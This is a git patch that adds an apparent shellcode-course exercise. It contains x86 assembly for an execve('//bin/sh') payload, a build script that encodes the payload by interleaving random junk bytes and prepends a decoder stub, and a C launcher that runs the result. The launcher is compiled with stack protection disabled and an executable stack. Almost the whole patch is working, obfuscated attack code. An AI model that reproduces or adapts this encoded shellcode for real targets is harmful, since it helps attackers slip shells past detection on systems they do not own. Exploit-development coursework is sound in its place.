From 2e6842607995aad0a0379232ea78ee14ca3fb430 Mon Sep 17 00:00:00 2001 From: arno01 Date: Thu, 11 Apr 2013 13:49:58 +0200 Subject: [PATCH] minor updates --- exam4/execve-stack.nasm | 70 ++++++++++++++++++++++++++++++++++++++++ exam4/make.sh | 66 +++++++++++++++++++++++++++++++++++++ exam4/shellcode | Bin 0 -> 4980 bytes exam4/shellcode.c | 11 +++++++ 4 files changed, 147 insertions(+) create mode 100644 exam4/execve-stack.nasm create mode 100755 exam4/make.sh create mode 100755 exam4/shellcode create mode 100644 exam4/shellcode.c diff --git a/exam4/execve-stack.nasm b/exam4/execve-stack.nasm new file mode 100644 index 0000000..77df821 --- /dev/null +++ b/exam4/execve-stack.nasm @@ -0,0 +1,70 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . + +; Filename: execve-stack.nasm +; Author: Andrey Arapov +; 2013 March + +global _start + + +section .text + +_start: + + ; + ; =============================== EXECVE ===================================== + ; + ; Now as we forwarded sockfd to a client, we can spawn shell. + ; Prepare the path, in little-endian, using the Python + ; >>> '//bin/sh'[::-1].encode('hex') + ; '68732f6e69622f2f' + ; + ; int execve(const char *filename, char *const argv[], char *const envp[]); + ; EAX EBX, ECX, EDX + ; 11 '//bin/sh' PTR to EBX NULL + ; + ; + + ; EAX + xor eax, eax + mov al, 11 ; execve syscall + + ; EBX + xor edx, edx + push edx ; NULL termination of '//bin/sh' string + push 0x68732f6e ; '//bin/sh' in reverse + push 0x69622f2f ; beginning of '//bin/sh' string is here + mov ebx, esp ; put the address of '//bin/sh' into ebx via esp + + ; ECX + push edx ; NULL termination of a stack + push ebx ; load our '//bin/sh' on a stack + mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string. + + ; EDX + push edx ; NULL terminator + mov edx, esp ; EDX is a PTR to a stack which has an address to NULL. + int 0x80 + + + ; === EXIT(0) === + ; void _exit(int status); + ; /usr/include/asm/unistd_32.h:#define __NR_exit 1 + xor eax, eax ; EAX = 0x000000 + mov al, 1 ; EAX = 0x000001 1: exit syscall + xor ebx, ebx ; EBX = 0x000000 0: success status + int 0x80 + + +;section .data diff --git a/exam4/make.sh b/exam4/make.sh new file mode 100755 index 0000000..66d2e3a --- /dev/null +++ b/exam4/make.sh @@ -0,0 +1,66 @@ +#!/usr/bin/env sh +# +# This script will generate shellcode.c and compile it +# + +# +# Compile the payload and decoder +# +echo " [+] Compiling the payload and decoder ..." +SPAYLOAD=./execve-stack +nasm -f elf32 -o $SPAYLOAD.o $SPAYLOAD.nasm && ld -m elf_i386 -o $SPAYLOAD $SPAYLOAD.o +SDECODER=./decoder +nasm -f elf32 -o $SDECODER.o $SDECODER.nasm && ld -m elf_i386 -o $SDECODER $SDECODER.o + +echo " [+] Preparing decoder shellcode ..." +DECODERSHELLCODE=$(echo -n "\""; for i in $(objdump -d $SDECODER -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done) + +# +# Encode the payload shellcode +# +echo " [+] Encoding the payload shellcode ..." +# +# $ echo -en '\x37\xFA\xD6\x3F' |ndisasm -b32 - +# 00000000 37 aaa +# 00000001 FA cli +# 00000002 D6 salc +# 00000003 3F aas +# + +garbage=('\x37' '\xFA' '\xD6' '\x3F'); +ENCPSHELLCODE=$(for i in $(objdump -d $SPAYLOAD |grep "^ " |cut -f2); do echo -n '\x'$i; echo -n ${garbage[$[RANDOM%4]]}; done; echo -n "\xAF\"") + +FULL_SHELLCODE=${DECODERSHELLCODE}${ENCPSHELLCODE} + +# +# Generate shellcode.c +# +echo " [+] Generating shellcode.c file ..." +cat > shellcode.c << EOF +#include +#include + +unsigned char code[] = \ +$FULL_SHELLCODE; + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} +EOF + +# +# Compile C code with GCC +# +echo " [+] Compiling shellcode.c with GCC ..." +gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode + +ls -la ./shellcode + +# +# Cleanup +# +rm ./$SPAYLOAD ./$SDECODER ./$SPAYLOAD.o ./$SDECODER.o + diff --git a/exam4/shellcode b/exam4/shellcode new file mode 100755 index 0000000000000000000000000000000000000000..23fc6816381de91afce07048b1648f941d17453e GIT binary patch literal 4980 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 literal 0 HcmV?d00001 diff --git a/exam4/shellcode.c b/exam4/shellcode.c new file mode 100644 index 0000000..51293f1 --- /dev/null +++ b/exam4/shellcode.c @@ -0,0 +1,11 @@ +#include +#include + +unsigned char code[] = "\xeb\x22\x5e\x31\xc9\x8a\x06\x46\x3c\x37\x74\xf9\x3c\xfa\x74\xf5\x3c\xd6\x74\xf1\x3c\x3f\x74\xed\x3c\xaf\x74\x06\x88\x04\x0a\x41\xeb\xe3\xff\xd2\xe8\xd9\xff\xff\xff\x31\x37\xc0\x3F\xb0\x37\x0b\xD6\x31\xFA\xd2\x3F\x52\x3F\x68\x3F\x6e\xFA\x2f\xFA\x73\xFA\x68\xFA\x68\xFA\x2f\x37\x2f\xFA\x62\xFA\x69\x37\x89\xD6\xe3\xFA\x52\xD6\x53\xD6\x89\x3F\xe1\xD6\x52\xD6\x89\x37\xe2\xFA\xcd\x37\x80\xD6\x31\xFA\xc0\x37\xb0\x37\x01\x37\x31\x3F\xdb\xD6\xcd\x3F\x80\xFA\xAF"; + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +}